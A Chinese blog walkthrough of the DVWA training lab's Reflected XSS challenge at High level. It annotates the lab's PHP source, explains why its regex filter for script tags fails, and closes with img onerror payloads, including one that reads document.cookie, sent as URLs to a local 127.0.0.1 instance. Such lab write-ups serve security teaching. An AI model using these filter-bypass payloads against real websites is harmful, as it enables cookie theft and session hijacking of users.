DVWA靶场通关笔记-反射型XSS(Reflected High级别)

于 2025-07-12 08:23:57 发布
阅读量1k 收藏 16
点赞数 44
CC 4.0 BY-SA版权
分类专栏: DVWA靶场 文章标签: DVWA靶场 XSS漏洞 反射型XSS XSS web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/148029754

目录

一、XSS

二、反射型XSS

三、源码分析

1、index.php

2、High.php

四、渗透实战

1、渗透准备

2、IMG注入

(1)弹框/mooyuan/

(2)弹框mooyuan

(3)弹框cookie

DVWA(Damn Vulnerable Web Application)中的反射型XSS关卡(Reflected)是用于练习和演示反射型XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本文对高等级别(High)的关卡进行渗透实战。

一、XSS

XSS(Cross-Site Scripting) 指的是攻击者通过在网页中注入恶意脚本,当用户访问该页面时,脚本会在用户浏览器中执行,从而窃取用户数据、会话信息或进行其他恶意操作。核心原理就是未对用户输入或输出进行适当过滤,导致恶意代码被浏览器解析执行。

XSS类型

位置

数据流向

反射型 XSS

服务器端

用户输入 → 服务器 → 响应中包含恶意代码

存储型 XSS

服务器端

用户输入 → 存储(数据库) → 所有用户访问时触发

DOM XSS

客户端 JavaScript 代码

用户输入 → 浏览器 DOM 操作 → 执行恶意代码

二、反射型XSS

反射型XSSReflected Cross-Site Scripting是一种常见的Web安全攻击,攻击者将恶意脚本注入URL参数中,当用户点击包含该参数的链接时,服务器将恶意代码反射到响应页面并执行。

三、源码分析

1、index.php

进入DVWA靶场源目录,找到index.php源码。

这段代码是DVWA靶场中反射型XSS攻击的演示页面,主要功能如下所示。

  • 初始化设置

    • 定义系统路径常量,加载必要文件,启动DVWA环境(含用户认证和安全检测)。

  • 安全等级控制

    • 根据用户Cookie中的security值(low/medium/high/impossible)动态加载不同防御级别的代码文件(low.php/medium.php/high.php/impossible.php)。

  • 反射型XSS测试界面

    • 生成一个表单,用户输入name参数并提交,服务端将输入反射到页面中(具体逻辑在引入的不同级别文件中实现)。

    • 在最高防御等级(impossible)时添加CSRF令牌。

  • 动态内容渲染

    • 变量$html由引入的不同文件生成,用于演示不同安全等级下的反射型XSS攻击效果。

 详细注释后的代码如下所示。

<?php
// 定义DVWA根目录路径常量
define('DVWA_WEB_PAGE_TO_ROOT', '../../');

// 引入DVWA核心页面初始化文件
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';

// 启动DVWA页面,要求用户已认证并启用PHPIDS(安全检测)
dvwaPageStartup(array('authenticated', 'phpids'));

// 创建新页面对象
$page = dvwaPageNewGrab();

// 设置页面标题(包含名称和默认分隔符)
$page['title'] = 'Vulnerability: Reflected Cross Site Scripting (XSS)' . $page['title_separator'] . $page['title'];

// 设置页面ID(用于标识当前页面)
$page['page_id'] = 'xss_r';

// 设置帮助按钮和查看源码按钮的链接目标
$page['help_button'] = 'xss_r';
$page['source_button'] = 'xss_r';

// 连接数据库
dvwaDatabaseConnect();

// 根据安全等级选择对应的级别文件
$vulnerabilityFile = '';
switch($_COOKIE['security']) {
    case 'low':
        $vulnerabilityFile = 'low.php';    // 低安全等级
        break;
    case 'medium':
        $vulnerabilityFile = 'medium.php'; // 中安全等级
        break;
    case 'high':
        $vulnerabilityFile = 'high.php';   // 高安全等级
        break;
    default:
        $vulnerabilityFile = 'impossible.php'; // 最高防御等级
        break;
}

// 引入对应安全等级的代码文件
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/xss_r/source/{$vulnerabilityFile}";

// 构建页面主体HTML
$page['body'] .= "
<div class=\"body_padded\">
    <h1>Vulnerability: Reflected Cross Site Scripting (XSS)</h1>

    <div class=\"vulnerable_code_area\">
        <form name=\"XSS\" action=\"#\" method=\"GET\">
            <p>
                What's your name?
                <input type=\"text\" name=\"name\">
                <input type=\"submit\" value=\"Submit\">
            </p>\n";

// 如果是最高防御等级,添加CSRF令牌
if($vulnerabilityFile == 'impossible.php')
    $page['body'] .= "            " . tokenField();

// 继续构建页面(包含动态生成的HTML内容和参考资料链接)
$page['body'] .= "
        </form>
        {$html}
    </div>

    <h2>More Information</h2>
    <ul>
        <li>" . dvwaExternalLinkUrlGet('https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)') . "</li>
        <li>" . dvwaExternalLinkUrlGet('https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet') . "</li>
        <li>" . dvwaExternalLinkUrlGet('https://en.wikipedia.org/wiki/Cross-site_scripting') . "</li>
        <li>" . dvwaExternalLinkUrlGet('http://www.cgisecurity.com/xss-faq.html') . "</li>
        <li>" . dvwaExternalLinkUrlGet('http://www.scriptalert1.com/') . "</li>
    </ul>
</div>\n";

// 输出最终生成的HTML页面
dvwaHtmlEcho($page);
?>

2、High.php

打开源码High.php,分析可知这段代码仅对name传入的内容进行简单过滤,如下所示。

代码的主要功能如下所示

  • 关闭浏览器XSS保护:X-XSS-Protection: 0 禁用浏览器内置的XSS过滤(现代浏览器已逐步废弃该机制,改用CSP)。
  • 获取并正则过滤用户输入:检查 name 参数是否存在,并使用正则表达式移除 <script> 标签(不区分大小写,且允许任意字符间隔)。
  • 输出到页面:将处理后的 name 值嵌入HTML的 <pre> 标签中返回。

很明显代码存在反射型XSS注入的可能性,具体原因如下所示。

  • 过滤不彻底仅替换 不缺分大小写的<script>标签。
    • 未处理其他危险标签(如 <img><svg>)或事件属性(如 onerror)。
    • 正则表达式允许任意字符间隔:虽然能过滤 <sCrIpT>,但可能误判或漏判复杂变种
    • 嵌套绕过:<scr<script>ipt> → 替换后仍为 <script>
  • 输出未编码:使用 ${name} 直接拼接字符串,未对 <>" 等特殊字符进行HTML实体转义。

详细注释后的代码如下所示。

<?php
// 禁用浏览器的XSS过滤保护(0表示关闭XSS防护)
header("X-XSS-Protection: 0");

// 检查GET请求中是否存在"name"参数且值不为NULL
if(array_key_exists("name", $_GET) && $_GET['name'] != NULL) {
    // 使用正则表达式过滤<script>标签(不区分大小写,且允许任意字符间隔)
    $name = preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET['name']);

    // 将处理后的用户输入拼接到HTML中,返回给前端
    $html .= "<pre>Hello ${name}</pre>";
}
?>

四、渗透实战

1、渗透准备

进入DVWA靶场,将安全级别设置为高级,具体如下所示。

打开靶场反射型XSS关卡High级别,此时完整URL地址如下所示。

http://127.0.0.1/dvwa/vulnerabilities/xss_r

2IMG注入

(1)弹框/mooyuan/

<img src=0 onerror=alert(/mooyuan/)>

完整的URL如下所示,成功弹框mooyuan。

http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<img+src=0+onerror=alert(/mooyuan/)>#

(2)弹框mooyuan

<img src=0 onerror=alert('mooyuan')>

 完整的URL如下所示,成功弹框mooyuan。

http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<img+src=0+onerror=alert('mooyuan')>#

(3)弹框cookie

<img src=0 onerror=alert(document.cookie)> 

  完整的URL如下所示,成功弹框cookie值。

http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<img+src=0+onerror=alert(document.cookie)>#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值